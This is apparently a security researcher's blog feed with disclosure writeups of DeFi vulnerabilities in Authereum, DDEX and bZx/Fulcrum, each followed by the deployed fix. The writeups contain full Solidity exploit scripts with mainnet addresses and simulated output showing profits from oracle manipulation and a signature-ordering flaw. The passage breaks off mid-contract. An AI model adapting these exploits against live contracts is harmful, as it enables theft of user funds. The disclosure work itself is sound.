Authereum wallets also allows relayers to submit transactions so the end user doesn't need to worry about paying for gas. In order to make sure evil relayers can't do bad things, the Authereum wallet verifies that the relayed transaction is signed by an admin key.

How to relay a transaction

Let's take a look at how a relayer might use Authereum meta transactions to relay an ERC20 approval.

First, the user provides the encoded transaction(s). This consists of the target contract, the amount of ether to be sent, the gas limit, and the transaction data. For an ERC20 approval, that might look something like this:

bytes memory encodedTransaction = abi.encode(
	0x6B175474E89094C44Da98b954EedeAC495271d0F, // dai
	0,
	uint(-1),
	abi.encodeWithSignature(
		"approve(address,uint256)",
		0xAb5801a7D398351b8bE11C439e05C5B3259aeC9B, // approve vitalik
		uint(-1) // for all my dai
	)
);
Don't spend it all in one place

Next, the user specifies the minimum gas price that they would like this transaction to be sent at, along with an estimated gas overhead. The user also specifies whether they want to pay in a token other than ETH, and at what rate ETH converts to the token.

Finally, the user provides a signature, signed with their admin key. Specifically, it's a signature for the following data.

bytes32 hash = keccak256(abi.encodePacked(
    "\x19Ethereum Signed Message:\n32",
    keccak256(abi.encode(
        address(wallet),
        wallet.executeMultipleAuthKeyMetaTransactions.selector,
        wallet.getChainId(),
        wallet.nonce(),
        [encodedTransaction],
        gasPrice,
        gasOverhead,
        feeTokenAddress,
        feeTokenRate
    ))
));
Source

When the relayer has been provided with all of the necessary information, they submit a transaction to executeMultipleAuthKeyMetaTransactions. That function looks something like this:

function executeMultipleAuthKeyMetaTransactions(
	bytes[] memory _transactions,
	uint256 _gasPrice,
	uint256 _gasOverhead,
	address _feeTokenAddress,
	uint256 _feeTokenRate,
	bytes memory _transactionMessageHashSignature
)
	public
	returns (bytes[] memory)
{
	uint256 _startGas = gasleft();

	(bytes32 _transactionMessageHash, bytes[] memory _returnValues) = _atomicExecuteMultipleMetaTransactions(
		_transactions,
		_gasPrice,
		_gasOverhead,
		_feeTokenAddress,
		_feeTokenRate
	);

	// Validate the signer
	_validateAuthKeyMetaTransactionSigs(
		_transactionMessageHash, _transactionMessageHashSignature
	);

	if (_shouldRefund(_transactions)) {
	  _issueRefund(_startGas, _gasPrice, _gasOverhead, _feeTokenAddress, _feeTokenRate);
	}

	return _returnValues;
}
Source

At this point, the Authereum wallet will atomically execute all of the transactions, verify that the transactions were signed by an admin key, and then issue a refund if necessary.

Notice anything wrong?

Meta all the things

If admins could use meta transactions to relay some transactions, it sure would be nice if they could use meta transactions to relay all transactions. However, the only surefire way to make sure that an admin sent a transaction is to check msg.sender, and that doesn't work in a meta transaction.

Actually, if we think about it, the wallet represents the admin. Only the admin can authorize transactions to be sent. That means that if the wallet is the caller, then the admin must have authorized the wallet to call itself, right? So maybe we can treat the wallet as a pseudo-admin of sorts, letting it do some of the scary privileged stuff.

function addAuthKey(address _authKey) external onlyAuthKeySenderOrSelf {
	require(authKeys[_authKey] == false, "BA: Auth key already added");
	authKeys[_authKey] = true;
	numAuthKeys += 1;
	emit AuthKeyAdded(_authKey);
}
Source

Hopefully there's no way for any random person to make the wallet call a random function on itself that would really suck.

Oops

Oops:

bytes memory exploitTransaction = abi.encode(
	wallet,
	0,
	uint(-1),
	abi.encodeWithSignature(
		"addAuthKey(address)",
		0x32993258F4Bb0f00e3C25cF00a9b490BF86509D8 // the hacker's address
	)
);

Oops oops oops:

bytes32 hash = keccak256(abi.encodePacked(
    "\x19Ethereum Signed Message:\n32",
    keccak256(abi.encode(
        address(wallet),
        wallet.executeMultipleAuthKeyMetaTransactions.selector,
        wallet.getChainId(),
        wallet.nonce(),
        [exploitTransaction],
        uint(0),
        uint(0),
        address(0),
        uint(0)
    ))
));

Oopsoopsoopsoopsoopsoopsoops:

wallet.executeMultipleAuthKeyMetaTransactions(
	[exploitTransaction],
	0,
	0,
	address(0),
	0,
	// signed by the hacker
	hex"274a0272b7dc3e465a7729bfc8b5e57bbf2e2e0a58e223680350564bbea20b7c7a3050f1ba533673dca92342f058ea178b7fecca02efa30a4b9ff082c7b086aa1c"
);

The full attack is available in this Gist.

Impact

Fortunately, Authereum just launched and there wasn't much to steal yet.

Solution

The Authereum team relocated the signature check to before the transactions get executed.

function executeMultipleAuthKeyMetaTransactions(
	bytes[] memory _transactions,
	uint256 _gasPrice,
	uint256 _gasOverhead,
	address _feeTokenAddress,
	uint256 _feeTokenRate,
	bytes memory _transactionMessageHashSignature
)
	public
	returns (bytes[] memory)
{
	uint256 _startGas = gasleft();

	// Hash the parameters
	bytes32 _transactionMessageHash = keccak256(abi.encode(
		address(this),
		msg.sig,
		getChainId(),
		nonce,
		_transactions,
		_gasPrice,
		_gasOverhead,
		_feeTokenAddress,
		_feeTokenRate
	)).toEthSignedMessageHash();

	// Validate the signer
	// NOTE: This must be done prior to the _atomicExecuteMultipleMetaTransactions() call for security purposes
	_validateAuthKeyMetaTransactionSigs(
		_transactionMessageHash, _transactionMessageHashSignature
	);

	(, bytes[] memory _returnValues) = _atomicExecuteMultipleMetaTransactions(
		_transactions,
		_gasPrice,
		_gasOverhead,
		_feeTokenAddress,
		_feeTokenRate
	);

	if (_shouldRefund(_transactions)) {
	  _issueRefund(_startGas, _gasPrice, _gasOverhead, _feeTokenAddress, _feeTokenRate);
	}

	return _returnValues;
}

Further Reading

]]>
<![CDATA[Taking undercollateralized loans for fun and for profit]]>https://samczsun.com/taking-undercollateralized-loans-for-fun-and-for-profit/5d708d0b5f582e0001bf6717Mon, 30 Sep 2019 16:20:35 GMTtl;dr

By relying on an on-chain decentralized price oracle without validating the rates returned, DDEX and bZx were susceptible to atomic price manipulation. This would have resulted in the loss of liquid ETH in the ETH/DAI market for DDEX, and loss of all liquid funds in bZx. Fortunately, no funds were actually lost.

What is decentralized lending?

First, let's talk about traditional lending. When you take out a loan, you typically need to provide some sort of collateral so that if you default on your loan, the lender can then seize the collateral. In order to determine how much collateral you need to supply, the lender typically knows or can reliably calculate the fair market value (FMV) of the collateral.

In decentralized lending, the same process occurs except now the lender is a smart contract that is isolated from the outside world. This means that it can't simply "know" the FMV of whatever collateral you're trying to provide.

To solve this problem, developers instruct the smart contract to query an oracle, which accepts the address of a token and returns the current price of that token in a desired currency (for example, ETH or USD). Different DeFi projects have taken different approaches to implementing this oracle, but they can generally all be classified in one of five ways (although some implementations blur the lines more than others):

  1. Off-chain Centralized Oracle
    This type of oracle simply accepts new prices from an off-chain source, typically an account controlled by the project. Due to the need to quickly update the oracle with new exchange rates, the account is typically an EOA and not a multisig. There may be some sanity checking to ensure that prices don't fluctuate too wildly. Compound Finance and Synthetix mainly use this type of oracle for most assets
  2. Off-chain Decentralized Oracle
    This type of oracle accepts new prices from multiple off-chain sources and merges the values through a mathematical function, such as an average. In this model, a multisig wallet is typically used to manage the list of authorized sources. Maker uses this type of oracle for ETH and other assets
  3. On-chain Centralized Oracle
    This type of oracle determines the price of assets using an on-chain source, such as a DEX. However, only a central authority can trigger the oracle to read from the on-chain source. Like an off-chain centralized oracle, this type of oracle requires rapid updates and as such the triggering account is likely an EOA and not a multisig. dYdX and Nuo use this type of oracle for certain assets
  4. On-chain Decentralized Oracle
    This type of oracle determines the price of assets using an on-chain source, but can be updated by anyone. There may be some sanity checking to ensure that prices don't fluctuate too wildly. DDEX uses this type oracle for DAI, while bZx uses this type of oracle for all assets
  5. Constant Oracle
    This type of oracle simply returns a constant value, and is typically used for stablecoins. Nearly all projects mentioned above use this type of oracle for USDC due to its guaranteed peg

The problem

While searching for additional vulnerable projects, I came across this tweet.

Someone asked for clarification, and the Uniswap project responded with the following.

These tweets explain the problem very clearly, but it's important to note that this problem exists for any oracle which can provide the FMV on-chain, not just Uniswap.

In general, if a price oracle is completely decentralized, then an attacker can manipulate the apparent price at a specific instant with minimal to no loss in slippage fees. If an attacker can then convince a DeFi dApp to check the oracle at the instant when the apparent price has been manipulated, then they can cause significant harm to the system. In the case of DDEX and bZx, it was possible to take out a loan that appeared to be sufficiently collateralized, but was in fact undercollateralized.

DDEX (Hydro Protocol)

DDEX is a decentralized exchange platform but are in the process of expanding into decentralized lending so that they can offer their users the ability to create leveraged long and short positions. They're currently beta testing their decentralized margin exchange.

On September 9th 2019, DDEX added DAI as an asset to their margin trading platform and enabled the ETH/DAI market. For the oracle, they specified this smart contract which returns the value of DAI/USD by calculating PriceOfETHInUSD/PriceOfETHInDAI. The value of ETH/USD is read from the Maker oracle, while the value of ETH/DAI is read from either Eth2Dai, or if the spread is too great, Uniswap.

function peek()
	public
	view
	returns (uint256 _price)
{
	uint256 makerDaoPrice = getMakerDaoPrice();

	if (makerDaoPrice == 0) {
		return _price;
	}

	uint256 eth2daiPrice = getEth2DaiPrice();

	if (eth2daiPrice > 0) {
		_price = makerDaoPrice.mul(ONE).div(eth2daiPrice);
		return _price;
	}

	uint256 uniswapPrice = getUniswapPrice();

	if (uniswapPrice > 0) {
		_price = makerDaoPrice.mul(ONE).div(uniswapPrice);
		return _price;
	}

	return _price;
}

function getEth2DaiPrice()
	public
	view
	returns (uint256)
{
	if (Eth2Dai.isClosed() || !Eth2Dai.buyEnabled() || !Eth2Dai.matchingEnabled()) {
		return 0;
	}

	uint256 bidDai = Eth2Dai.getBuyAmount(address(DAI), WETH, eth2daiETHAmount);
	uint256 askDai = Eth2Dai.getPayAmount(address(DAI), WETH, eth2daiETHAmount);

	uint256 bidPrice = bidDai.mul(ONE).div(eth2daiETHAmount);
	uint256 askPrice = askDai.mul(ONE).div(eth2daiETHAmount);

	uint256 spread = askPrice.mul(ONE).div(bidPrice).sub(ONE);

	if (spread > eth2daiMaxSpread) {
		return 0;
	} else {
		return bidPrice.add(askPrice).div(2);
	}
}

function getUniswapPrice()
	public
	view
	returns (uint256)
{
	uint256 ethAmount = UNISWAP.balance;
	uint256 daiAmount = DAI.balanceOf(UNISWAP);
	uint256 uniswapPrice = daiAmount.mul(10**18).div(ethAmount);

	if (ethAmount < uniswapMinETHAmount) {
		return 0;
	} else {
		return uniswapPrice;
	}
}

function getMakerDaoPrice()
	public
	view
	returns (uint256)
{
	(bytes32 value, bool has) = makerDaoOracle.peek();

	if (has) {
		return uint256(value);
	} else {
		return 0;
	}
}
Source

In order to trigger an update and cause the oracle to refresh its stored value, a user simply has to call updatePrice().

function updatePrice()
	public
	returns (bool)
{
	uint256 _price = peek();

	if (_price != 0) {
		price = _price;
		emit UpdatePrice(price);
		return true;
	} else {
		return false;
	}
}
Source

The attack

Let's assume we can manipulate the apparent value of DAI/USD. If this is the case, we would like to use this to borrow all of the ETH in the system while providing as little DAI as possible. To achieve this, we can either lower the apparent value of ETH/USD or increase the apparent value of DAI/USD. Since we're already assuming that the apparent value of DAI/USD is manipulable, we'll choose the latter.

To increase the apparent value DAI/USD, we can either increase the apparent value of ETH/USD, or decrease the apparent value of ETH/DAI. For all intents and purposes manipulating Maker's oracle is impossible, so we'll try decreasing the apparent value of ETH/DAI.

The oracle will calculate the value of ETH/DAI as reported by Eth2Dai by taking the average of the current asking price and the current bidding price. In order to decrease this value, we'll need to lower the current bidding price by filling existing orders and then lower the current asking price by placing new orders.

However, this requires a significant initial investment (as we need to fill orders then make an equivalent number of orders) and is non-trivial to implement. On the other hand, we can drop the Uniswap price simply by selling a large amount of DAI to Uniswap. As such, we'll aim to bypass the Eth2Dai logic and manipulate the Uniswap price.

In order to bypass Eth2Dai, we need to manipulate the magnitude of the spread. We can do this in one of two ways:

  1. Clear out one side of the orderbook while leaving the other alone. This causes spread to increase positively
  2. Force a crossed orderbook by listing an extreme buy or sell order. This causes spread to decrease negatively.

While option 2 would result in no losses from taking unfavorable orders, the use of SafeMath disallows a crossed orderbook and as such is unavailable to us. Instead, we'll force a large positive spread by clearing out one side of the orderbook. This will cause the DAI oracle to fallback to Uniswap to determine the price of DAI. Then, we can cause the Uniswap price of DAI/ETH to drop by buying a large amount of DAI. Once the apparent value of DAI/USD has been manipulated, it's trivial to take out a loan like as usual.

Demo

The following script will turn a profit of approximately 70 ETH by:

  1. Clearing out Eth2Dai's sell orders until the spread is large enough that the oracle rejects the price
  2. Buying more DAI from Uniswap, dropping the price from 213DAI/ETH to 13DAI/ETH
  3. Borrowing all the available ETH (~120) for a small amount of DAI (~2500)
  4. Selling the DAI we bought from Uniswap back to Uniswap
  5. Selling the DAI we bought from Eth2Dai back to Eth2Dai
  6. Resetting the oracle (don't want anyone else abusing our favorable rates)
contract DDEXExploit is Script, Constants, TokenHelper {
    OracleLike private constant ETH_ORACLE = OracleLike(0x8984F1CFf1d614a7404b0cfE97C6fa9110b93Bd2);
    DaiOracleLike private constant DAI_ORACLE = DaiOracleLike(0xeB1f1A285fee2AB60D2910F2786E1D036E09EAA8);
    
    ERC20Like private constant HYDRO_ETH = ERC20Like(0x000000000000000000000000000000000000000E);
    HydroLike private constant HYDRO = HydroLike(0x241e82C79452F51fbfc89Fac6d912e021dB1a3B7);
    
    uint16 private constant ETHDAI_MARKET_ID = 1;
    
    uint private constant INITIAL_BALANCE = 25000 ether;
    
    function setup() public {
        name("ddex-exploit");
        blockNumber(8572000);
    }
    
    function run() public {
        begin("exploit")
            .withBalance(INITIAL_BALANCE)
            .first(this.checkRates)
            .then(this.skewRates)
            .then(this.checkRates)
            .then(this.steal)
            .then(this.cleanup)
            .then(this.checkProfits);
    }
    
    function checkRates() external {
        uint ethPrice = ETH_ORACLE.getPrice(HYDRO_ETH);
        uint daiPrice = DAI_ORACLE.getPrice(DAI);
        
        printf("eth=%.18u dai=%.18u\n", abi.encode(ethPrice, daiPrice));
    }
    
    uint private boughtFromMatchingMarket = 0;
    
    function skewRates() external {
        skewUniswapPrice();
        skewMatchingMarket();
        require(DAI_ORACLE.updatePrice());
    }
    
    function skewUniswapPrice() internal {
        DAI.getFromUniswap(DAI.balanceOf(address(DAI.getUniswapExchange())) * 75 / 100);
    }
    
    function skewMatchingMarket() internal {
        uint start = DAI.balanceOf(address(this));
        WETH.deposit.value(address(this).balance)();
        WETH.approve(address(MATCHING_MARKET), uint(-1));
        while (DAI_ORACLE.getEth2DaiPrice() != 0) {
            MATCHING_MARKET.buyAllAmount(DAI, 5000 ether, WETH, uint(-1));
        }
        boughtFromMatchingMarket = DAI.balanceOf(address(this)) - start;
        WETH.withdrawAll();
    }
    
    function steal() external {
        HydroLike.Market memory ethDaiMarket = HYDRO.getMarket(ETHDAI_MARKET_ID);
        HydroLike.BalancePath memory commonPath = HydroLike.BalancePath({
            category: HydroLike.BalanceCategory.Common,
            marketID: 0,
            user: address(this)
        });
        HydroLike.BalancePath memory ethDaiPath = HydroLike.BalancePath({
            category: HydroLike.BalanceCategory.CollateralAccount,
            marketID: 1,
            user: address(this)
        });
        
        uint ethWanted = HYDRO.getPoolCashableAmount(HYDRO_ETH);
        uint daiRequired = ETH_ORACLE.getPrice(HYDRO_ETH) * ethWanted * ethDaiMarket.withdrawRate / DAI_ORACLE.getPrice(DAI) / 1 ether + 1 ether;
        
        printf("ethWanted=%.18u daiNeeded=%.18u\n", abi.encode(ethWanted, daiRequired));
        
        HydroLike.Action[] memory actions = new HydroLike.Action[](5);
        actions[0] = HydroLike.Action({
            actionType: HydroLike.ActionType.Deposit,
            encodedParams: abi.encode(address(DAI), uint(daiRequired))
        });
        actions[1] = HydroLike.Action({
            actionType: HydroLike.ActionType.Transfer,
            encodedParams: abi.encode(address(DAI), commonPath, ethDaiPath, uint(daiRequired))
        });
        actions[2] = HydroLike.Action({
            actionType: HydroLike.ActionType.Borrow,
            encodedParams: abi.encode(uint16(ETHDAI_MARKET_ID), address(HYDRO_ETH), uint(ethWanted))
        });
        actions[3] = HydroLike.Action({
            actionType: HydroLike.ActionType.Transfer,
            encodedParams: abi.encode(address(HYDRO_ETH), ethDaiPath, commonPath, uint(ethWanted))
        });
        actions[4] = HydroLike.Action({
            actionType: HydroLike.ActionType.Withdraw,
            encodedParams: abi.encode(address(HYDRO_ETH), uint(ethWanted))
        });
        DAI.approve(address(HYDRO), daiRequired);
        HYDRO.batch(actions);
    }
    
    function cleanup() external {
        DAI.approve(address(MATCHING_MARKET), uint(-1));
        MATCHING_MARKET.sellAllAmount(DAI, boughtFromMatchingMarket, WETH, uint(0));
        WETH.withdrawAll();
        
        DAI.giveAllToUniswap();
        require(DAI_ORACLE.updatePrice());
    }
    
    function checkProfits() external {
        printf("profits=%.18u\n", abi.encode(address(this).balance - INITIAL_BALANCE));
    }
}

/*
### running script "ddex-exploit" at block 8572000
#### executing step: exploit
##### calling: checkRates()
eth=213.440000000000000000 dai=1.003140638067989051
##### calling: skewRates()
##### calling: checkRates()
eth=213.440000000000000000 dai=16.058419875880325580
##### calling: steal()
ethWanted=122.103009983203364425 daiNeeded=2435.392672403537525078
##### calling: cleanup()
##### calling: checkProfits()
profits=72.140629996890984407
#### finished executing step: exploit
*/

Solution

The DDEX team fixed this by deploying a new oracle which places sanity bounds on the price of DAI, currently set to 0.95 and 1.05.

function updatePrice()
	public
	returns (bool)
{
	uint256 _price = peek();

	if (_price == 0) {
		return false;
	}

	if (_price == price) {
		return true;
	}

	if (_price > maxPrice) {
		_price = maxPrice;
	} else if (_price < minPrice) {
		_price = minPrice;
	}

	price = _price;
	emit UpdatePrice(price);

	return true;
}
Source

bZx and Fulcrum

bZx is a decentralized margin-trading protocol, while Fulcrum is a project built by the bZx team on top of bZx itself. One feature of Fulcrum is the ability to take a loan on an iToken (read more about that here) using any* other token as collateral. In order to determine how much collateral is needed, bZx uses the Kyber Network as an on-chain decentralized oracle to check the conversion rate between the collateral token and the loan token.
* if it's tradable on Kyber

However, it's important to first understand how the Kyber Network functions. Unlike most other DEXes, the Kyber Network derives liquidity from reserves (read more about that here). When a user wants to make a trade between two tokens A and B, the main Kyber contract will query all registered reserves for the best rate between A/ETH and ETH/B, then perform the trade using the two reserves selected.

Reserves can be listed automatically through the PermissionlessOrderbookReserveLister contract, which will create a permissionless reserve. Reserves can also be listed by the Kyber team on behalf of a market maker after KYC and legal requirements are met. In this case, the reserve will be a permissioned reserve. When conducting a trade using Kyber, traders have the option of only using permissioned reserves, or using all available reserves.

The attack

When bZx checks the price of a collateral token, it specifies that only permissioned reserves should be used. This decision was made based on the Kyber whitepaper at the time, with the logic being that permissioned reserves had to undergo review and so the rates should be "correct".

Source, Credit: Kyber Network

This means that if we can somehow increase the rate reported by a permissioned reserve, we can trick Fulcrum into thinking our collateral is worth more than it really is.

A permissioned OrderbookReserve

On June 16 2019, the Kyber team listed an OrderbookReserve for the WAX token as a permissioned reserve in this transaction. This was interesting because the statement "an OrderbookReserve is always permissioned" was considered to be axiomatic.

After this reserve was listed, the Kyber Network itself continued to perform according to specifications. However, we can now significantly affect the apparent exchange rate between WAX and ETH simply by listing an order, which means that we can trick any project which relies on Kyber to provide an accurate FMV.

Demo

The following script will turn a profit of approximately 1200ETH by:

  1. Listing an order buying 1 WAX for 10 ETH, increasing the price from 0.00ETH/WAX to 10ETH/WAX
  2. Borrowing DAI from bZx using WAX as a collateral
  3. Cancelling all orders and converting all assets to ETH
contract BZxWAXExploit is Script, Constants, TokenHelper, BZxHelpers {
    BZxLoanTokenV2Like private constant BZX_DAI = BZxLoanTokenV2Like(0x14094949152EDDBFcd073717200DA82fEd8dC960);
    
    ERC20Like private constant WAX = ERC20Like(0x39Bb259F66E1C59d5ABEF88375979b4D20D98022);
    OrderbookReserveLike private constant WAX_ORDER_BOOK = OrderbookReserveLike(0x75fF6BeC6Ed398FA80EA1596cef422D64681F057);
    
    uint constant private INITIAL_BALANCE = 150 ether;
    
    function setup() public {
        name("bzx-wax-exploit");
        blockNumber(8455720);
    }
    
    function run() public {
        begin("exploit")
            .withBalance(INITIAL_BALANCE)
            .first(this.checkRates)
            .then(this.makeOrder)
            .then(this.checkRates)
            .then(this.borrow)
            .then(this.cleanup)
            .finally(this.checkProfits);
    }
    
    uint constant rateCheckAmount = 1e8;
    
    function checkRates() external {
        (uint rate, uint slippage) = KYBER_NETWORK.getExpectedRate(WAX, KYBER_ETH, rateCheckAmount);
        printf("checking rates tokens=%.8u rate=%.18u slippage=%.18u\n", abi.encode(rateCheckAmount, rate, slippage));
    }
    
    uint constant waxBidAmount = 1e8;
    uint constant ethOfferAmount = 10 ether;
    uint32 private orderId;
    function makeOrder() external {
        orderId = WAX_ORDER_BOOK.ethToTokenList().nextFreeId();
        
        uint kncRequired = WAX_ORDER_BOOK.calcKncStake(ethOfferAmount);
        printf("making malicious order kncRequired=%.u\n", abi.encode(KNC.decimals(), kncRequired));
        
        KNC.getFromUniswap(kncRequired);
        WAX.getFromBancor(1 ether);
        
        WAX.approve(address(WAX_ORDER_BOOK), waxBidAmount);
        KNC.approve(address(WAX_ORDER_BOOK), kncRequired);
        
        WAX_ORDER_BOOK.depositEther.value(ethOfferAmount)(address(this));
        WAX_ORDER_BOOK.depositToken(address(this), waxBidAmount);
        WAX_ORDER_BOOK.depositKncForFee(address(this), kncRequired);
        require(WAX_ORDER_BOOK.submitEthToTokenOrder(uint128(ethOfferAmount), uint128(waxBidAmount)));
    }
    
    function borrow() external {
        bytes32 hash = doBorrow(BZX_DAI, false, BZX_DAI.marketLiquidity(), DAI, WAX);
        printf("borrowing loanHash=%32x\n", abi.encode(hash));
    }
    
    function cleanup() external {
        require(WAX_ORDER_BOOK.cancelEthToTokenOrder(orderId));
        WAX_ORDER_BOOK.withdrawEther(WAX_ORDER_BOOK.makerFunds(address(this), KYBER_ETH));
        WAX_ORDER_BOOK.withdrawToken(WAX_ORDER_BOOK.makerFunds(address(this), WAX));
        WAX_ORDER_BOOK.withdrawKncFee(WAX_ORDER_BOOK.makerKnc(address(this)));
        DAI.giveAllToUniswap();
        KNC.giveAllToUniswap();
        WAX.giveAllToBancor();
        WETH.withdrawAll();
    }
    
    function checkProfits() external {
        printf("profits=%.18u\n", abi.encode(address(this).balance - INITIAL_BALANCE));
    }
    
    function borrowInterest(uint amount) internal {
        DAI.getFromUniswap(amount);
    }
}

/*
### running script "bzx-wax-exploit" at block 8455720
#### executing step: exploit
##### calling: checkRates()
checking rates tokens=1.00000000 rate=0.000000000000000000 slippage=0.000000000000000000
##### calling: makeOrder()
making malicious order kncRequired=127.438017578344399080
##### calling: checkRates()
checking rates tokens=1.00000000 rate=10.000000000000000000 slippage=9.700000000000000000
##### calling: borrow()
collateral_required=232.02826470, interest_required=19750.481385867262370788
borrowing loanHash=0x2cca5c037a25b47338027b9d1bed55d6bc131b3d1096925538f611240d143c64
##### calling: cleanup()
##### calling: checkProfits()
profits=1170.851523093083307797
#### finished executing step: exploit
*/

Solution

The bZx team blocked this attack by whitelisting tokens which can be used as collateral.

Eth2Dai

Now that there's a whitelist on the tokens that can be used as collateral, we'll need to through all the permissioned reserves to see if there's anything else that we can abuse. It turns out that DAI, one of the whitelisted tokens, has a permissioned reserve which integrates with Eth2Dai. As Eth2Dai allows users to create limit orders, this is essentially the previous attack but with more steps.

Interestingly, we first observe that although the Eth2Dai contract is titled MatchingMarket, it's not strictly true that all new orders will be automatically matched. This is because while the functions offer(uint,ERC20,uint,ERC20,uint) and offer(uint,ERC20,uint,ERC20,uint,bool) will trigger the matching logic, the function offer(uint,ERC20,uint,ERC20) does not.

// Make a new offer. Takes funds from the caller into market escrow.
function offer(
	uint pay_amt,    //maker (ask) sell how much
	ERC20 pay_gem,   //maker (ask) sell which token
	uint buy_amt,    //maker (ask) buy how much
	ERC20 buy_gem,   //maker (ask) buy which token
	uint pos         //position to insert offer, 0 should be used if unknown
)
	public
	can_offer
	returns (uint)
{
	return offer(pay_amt, pay_gem, buy_amt, buy_gem, pos, true);
}

function offer(
	uint pay_amt,    //maker (ask) sell how much
	ERC20 pay_gem,   //maker (ask) sell which token
	uint buy_amt,    //maker (ask) buy how much
	ERC20 buy_gem,   //maker (ask) buy which token
	uint pos,        //position to insert offer, 0 should be used if unknown
	bool rounding    //match "close enough" orders?
)
	public
	can_offer
	returns (uint)
{
	require(!locked, "Reentrancy attempt");
	require(_dust[pay_gem] <= pay_amt);

	if (matchingEnabled) {
	  return _matcho(pay_amt, pay_gem, buy_amt, buy_gem, pos, rounding);
	}
	return super.offer(pay_amt, pay_gem, buy_amt, buy_gem);
}
Source

Furthermore, we observe that even though the comments seem to suggest that only authorized users can call offer(uint,ERC20,uint,ERC20), there's no authorization logic at all.

// Make a new offer. Takes funds from the caller into market escrow.
//
// If matching is enabled:
//     * creates new offer without putting it in
//       the sorted list.
//     * available to authorized contracts only!
//     * keepers should call insert(id,pos)
//       to put offer in the sorted list.
//
// If matching is disabled:
//     * calls expiring market's offer().
//     * available to everyone without authorization.
//     * no sorting is done.
//
function offer(
	uint pay_amt,    //maker (ask) sell how much
	ERC20 pay_gem,   //maker (ask) sell which token
	uint buy_amt,    //taker (ask) buy how much
	ERC20 buy_gem    //taker (ask) buy which token
)
	public
	returns (uint)
{
	require(!locked, "Reentrancy attempt");
	var fn = matchingEnabled ? _offeru : super.offer;
	return fn(pay_amt, pay_gem, buy_amt, buy_gem);
}

While in practice lack of authorization is irrelevant as arbitrage bots will quickly fill any orders that can be automatically matched, in an atomic transaction we can create and cancel arbitrage-able orders and no bots will be able to fill them.

All that's left is to slightly modify our script from the previous attack to place orders on Eth2Dai instead of the OrderbookReserve. Note that in this case we will need to call both order(uint,ERC20,uint,ERC20) to submit the order to Eth2Dai without it being atomically matched, and then insert(uint,uint) in order to manually sort the order without triggering matching.

Demo

The following script will turn a profit of approximately 2500ETH by:

  1. Listing an order buying 1 DAI for 10 ETH, increasing the price from 0.006ETH/DAI to 9.98ETH/DAI.
  2. Borrowing ETH from bZx using DAI as collateral
  3. Cancelling all orders and converting all assets to ETH
contract BZxOasisExploit is Script, Constants, TokenHelper, BZxHelpers {
    BZxLoanTokenV2Like private constant BZX_ETH = BZxLoanTokenV2Like(0x77f973FCaF871459aa58cd81881Ce453759281bC);
    
    uint constant private INITIAL_BALANCE = 250 ether;
    
    function setup() public {
        name("bzx-oasis-exploit");
        blockNumber(8455720);
    }
    
    function run() public {
        begin("exploit")
            .withBalance(INITIAL_BALANCE)
            .first(this.checkRates)
            .then(this.makeOrder)
            .then(this.checkRates)
            .then(this.borrow)
            .then(this.cleanup)
            .finally(this.checkProfits);
    }
    
    uint constant rateCheckAmount = 1 ether;
    
    function checkRates() external {
        (uint rate, uint slippage) = KYBER_NETWORK.getExpectedRate(DAI, KYBER_ETH, rateCheckAmount);
        printf("checking rates tokens=%.18u rate=%.18u slippage=%.18u\n", abi.encode(rateCheckAmount, rate, slippage));
    }
    
    uint private id;
    
    uint constant daiBidAmount = 1 ether;
    uint constant ethOfferAmount = 10 ether;
    function makeOrder() external {
        WETH.deposit.value(ethOfferAmount)();
        WETH.approve(address(MATCHING_MARKET), ethOfferAmount);
        id = MATCHING_MARKET.offer(ethOfferAmount, WETH, daiBidAmount, DAI);
        printf("made order id=%u\n", abi.encode(id));
        
        require(MATCHING_MARKET.insert(id, 0));
    }
    
    function borrow() external {
        bytes32 hash = doBorrow(BZX_ETH, false, BZX_ETH.marketLiquidity(), WETH, DAI);
        printf("borrowing loanHash=%32x\n", abi.encode(hash));
    }
    
    function cleanup() external {
        require(MATCHING_MARKET.cancel(id));
        DAI.giveAllToUniswap();
        WETH.withdrawAll();
    }
    
    function checkProfits() external {
        printf("profits=%.18u\n", abi.encode(address(this).balance - INITIAL_BALANCE));
    }
    
    function borrowInterest(uint amount) internal {
        WETH.deposit.value(amount)();
    }
    
    function borrowCollateral(uint amount) internal {
        DAI.getFromUniswap(amount);
    }
}

/*
### running script "bzx-oasis-exploit" at block 8455720
#### executing step: exploit
##### calling: checkRates()
checking rates tokens=1.000000000000000000 rate=0.005950387240736517 slippage=0.005771875623514421
##### calling: makeOrder()
made order id=414191
##### calling: checkRates()
checking rates tokens=1.000000000000000000 rate=9.975000000000000000 slippage=9.675750000000000000
##### calling: borrow()
collateral_required=398.831304885561111810, interest_required=203.458599916962956188
borrowing loanHash=0x947839881794b73d61a0a27ecdbe8213f543bdd4f4a578eedb5e1be57221109c
##### calling: cleanup()
##### calling: checkProfits()
profits=2446.376892708285686012
#### finished executing step: exploit
*/

Solution

The bZx team blocked this attack by modifying the oracle logic such that if the collateral and loan token were both either DAI or WETH, then the exchange rate would be loaded directly from Maker's oracles.

However, this solution was incomplete because of the way Kyber resolves the best rate. If you'll recall, Kyber determines the best rate for A/B by determining the best rate for A/ETH and ETH/B, then calculating the amount of B that could be bought with the ETH received by trading A.

This meant that if we were to attempt to borrow a non-ETH token such as USDC using DAI as collateral, Kyber would first determine the best exchange rate for DAI/ETH, then the best rate for ETH/USDC, and finally the best rate for DAI/USDC. Because we can artificially increase the exchange rate for DAI/ETH, we can still manipulate the exchange rate for DAI/USDC even though we don't control a permissioned USDC reserve.

The bZx team blocked this attack in two ways:

  1. If either the loan token or collateral token wasn't ETH, then bZx would manually determine the exchange rate between the token and ETH, unless
  2. The loan token or collateral token was a USD-based stablecoin, in which case bZx would use the rate from Maker's oracle

Uniswap

An astute reader may notice at this point that bZx's solution still does not handle incorrect FMVs for arbitrary tokens. This means that if we can find another permissioned reserve which can be manipulated, we can take out yet another undercollateralized loan.

After sifting through all the registered permissioned reserves for the whitelisted tokens, we notice that the REP token has a reserve which integrates with Uniswap. We already know from our attacks on DDEX that Uniswap's prices can be manipulated, so we can re-purpose our previous attack and substitute Eth2Dai and DAI for Uniswap and REP.

Demo

The following script will turn a profit of approximately 2500ETH by:

  1. Performing a large order buy on Uniswap's REP exchange, increasing the price from 0.05ETH/REP to 6.05ETH/REP
  2. Borrowing ETH from bZx using REP as collateral
  3. Cancelling all orders and convert all assets to ETH
contract BZxUniswapExploit is Script, Constants, TokenHelper, BZxHelpers {
    BZxLoanTokenV3Like private constant BZX_ETH = BZxLoanTokenV3Like(0x77f973FCaF871459aa58cd81881Ce453759281bC);
    
    uint constant private INITIAL_BALANCE = 5000 ether;
    
    function setup() public {
